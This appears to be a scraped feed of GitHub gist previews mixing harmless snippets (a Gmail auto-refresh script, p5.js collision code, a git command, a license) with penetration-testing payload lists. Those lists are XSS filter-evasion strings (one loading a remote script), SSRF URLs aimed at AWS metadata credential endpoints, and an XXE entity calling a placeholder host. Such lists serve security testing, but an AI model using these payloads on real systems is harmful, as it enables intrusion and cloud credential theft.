ThomasOrlita

setInterval(() => {
  location.href = 'https://mail.google.com/mail/u/0/#settings/accounts';

  const elements = [...document.querySelectorAll('span')].filter(el => el.textContent.includes('Check mail now'));
  // const elements = document.querySelectorAll('.rP.sA');
  
  elements.forEach(el => el.click());
}, 5 * 60 * 1000);

ThomasOrlita

function collisionPointCircle(pointX, pointY, circleX, circleY, circleR) {
  return p5.prototype.dist(pointX, pointY, circleX, circleY) <= circleR;
}

function collisionCirclePoint(circleX, circleY, circleR, pointX, pointY) {
  return collisionPointCircle(pointX, pointY, circleX, circleY, circleR);
}

function collisionPointLine(pointX, pointY, lineX1, lineY1, lineX2, lineY2) {
  var d1 = dist(pointX, pointY, lineX1, lineY1);

ThomasOrlita

<script\x20type="text/javascript">javascript:alert(0);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(2);</script>
<script\x09type="text/javascript">javascript:alert(3);</script>
<script\x0Ctype="text/javascript">javascript:alert(4);</script>
<script\x2Ftype="text/javascript">javascript:alert(5);</script>
<script\x0Atype="text/javascript">javascript:alert(6);</script>
'`"><\x3Cscript>javascript:alert(7)</script>        
'`"><\x00script>javascript:alert(8)</script>
<img src=1 href=1 onerror="javascript:alert(9)"></img>

wilsonsilva

# https://stackoverflow.com/a/44672195/3013522
git reset --soft HEAD~1

iffy

node_modules
dist/
yarn.lock
wwwroot

guilhermepontes

// original gist
const shuffleArray = arr => arr.sort(() => Math.random() - 0.5);

// fully random by @BetonMAN
const shuffleArray = arr => arr
  .map(a => [Math.random(), a])
  .sort((a, b) => a[0] - b[0])
  .map(a => a[1]);

shuffleArray([1, 2, 3]) //[3, 1, 2]

BuffaloWill

## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

## AWS 
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

rvrsh3ll

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

staaldraad

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

xem

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
                    Version 2, December 2004

 Copyright (C) 2011 YOUR_NAME_HERE <YOUR_URL_HERE>

 Everyone is permitted to copy and distribute verbatim or modified
 copies of this license document, and changing it is allowed as long
 as the name is changed.

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE